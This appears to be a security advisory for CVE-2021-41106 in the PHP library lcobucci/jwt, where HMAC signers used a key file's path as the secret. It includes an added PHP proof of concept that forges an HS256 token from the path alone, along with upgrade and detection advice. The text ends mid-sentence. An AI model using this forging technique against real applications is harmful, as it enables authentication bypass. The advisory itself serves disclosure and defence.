CVE-2021-41106: File reference keys lead to incorrect hashes on HMAC algorithms

CVSS Score
4.4 (CVSS v3.1)

Basic Information

EPSS Score
0.08406%
Published
9/29/2021
Updated
2/6/2024
KEV Status
No
Technology
PHP

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| lcobucci/jwt | composer | >= 3.4.0, < 3.4.6 | 3.4.6 |
| lcobucci/jwt | composer | >= 4.0.0, < 4.0.4 | 4.0.4 |
| lcobucci/jwt | composer | >= 4.1.0, < 4.1.5 | 4.1.5 |

Vulnerability Intelligence

Root Cause Analysis

The vulnerability stems from the original LocalFileReference implementation, where the contents() method returned a file:// URI string for the key path instead of reading the file's contents. The OpenSSL-backed RSA and ECDSA signers accept such a URI as a key reference, so the defect went unnoticed there, but the HMAC signers (HS256, HS384, HS512) use the returned string verbatim as the secret: tokens were signed and validated with the predictable path string rather than the key material, so anyone who knows the path can produce signatures the verifier accepts. This is confirmed by the patch, which changes contents() to load the file contents via InMemory::file() and adds a deprecation notice to LocalFileReference, and by the added test cases showing HMAC validation failing when a path string is used instead of the actual key material. The fix shipped in 3.4.6, 4.0.4 and 4.1.5; code on an affected version should upgrade and, since the class is deprecated, switch to InMemory::file() for file-backed keys.
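The following is an added example, not code from lcobucci/jwt or from this advisory. It models the flawed contents() of the affected versions next to the patched behaviour and shows that a token signed with nothing more than the key file's path passes an HS256 check against the vulnerable key object but fails against the patched one. The file path, the payload and the helper names are constructed for the demo.

```php
<?php
// Added example (not lcobucci/jwt's own code): models the flawed
// LocalFileReference::contents() of the affected versions against the
// patched behaviour, using an HS256-style signature over a constructed
// header.payload. Run with: php hmac-key-path.php
declare(strict_types=1);

// Demo key file (constructed); the real secret is the 32 random bytes.
$keyPath = sys_get_temp_dir() . '/demo-hmac.key';
file_put_contents($keyPath, random_bytes(32));

// Affected versions: contents() returned the URI of the file. OpenSSL-based
// signers accept that as a key reference, but the HMAC signer used the
// string verbatim as the secret.
function vulnerableContents(string $path): string
{
    return 'file://' . $path;
}

// Patched versions (3.4.6 / 4.0.4 / 4.1.5): contents() returns the bytes
// of the file, as InMemory::file() does.
function patchedContents(string $path): string
{
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException("cannot read key file: $path");
    }
    return $data;
}

function b64url(string $raw): string
{
    return rtrim(strtr(base64_encode($raw), '+/', '-_'), '=');
}

// HS256 as the JWT spec defines it: HMAC-SHA256 over "header.payload".
function hs256(string $signingInput, string $key): string
{
    return b64url(hash_hmac('sha256', $signingInput, $key, true));
}

$header  = b64url(json_encode(['typ' => 'JWT', 'alg' => 'HS256']));
$payload = b64url(json_encode(['sub' => 'admin', 'exp' => time() + 3600]));
$input   = $header . '.' . $payload;

// An attacker who knows only the path of the key file (no read access to
// its contents) can compute the signature the vulnerable verifier expects.
$forged = hs256($input, 'file://' . $keyPath);

$acceptedByVulnerable = hash_equals(hs256($input, vulnerableContents($keyPath)), $forged);
$acceptedByPatched    = hash_equals(hs256($input, patchedContents($keyPath)), $forged);

printf("vulnerable verifier accepts path-keyed token: %s\n", $acceptedByVulnerable ? 'yes' : 'no');
printf("patched verifier accepts path-keyed token:    %s\n", $acceptedByPatched ? 'yes' : 'no');

unlink($keyPath);
```

To check whether an application is exposed, compare the installed lcobucci/jwt version in composer.lock against the table above and search the code base for LocalFileReference used together with an HMAC signer (Signer\Hmac\Sha256, Sha384 or Sha512); RSA and ECDSA users of the same class are not affected by this bug because their signers consume the URI as a key reference.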

WAF Protection Rules

WAF Rule

### Impact
Users of HMAC-based algorithms (HS256, HS384, and HS512) combined with `Lcobucci\JWT\Signer\Key\LocalFileReference` as key are having their tokens issued/validated using the file path as hashing key - instead of the contents. The HMAC
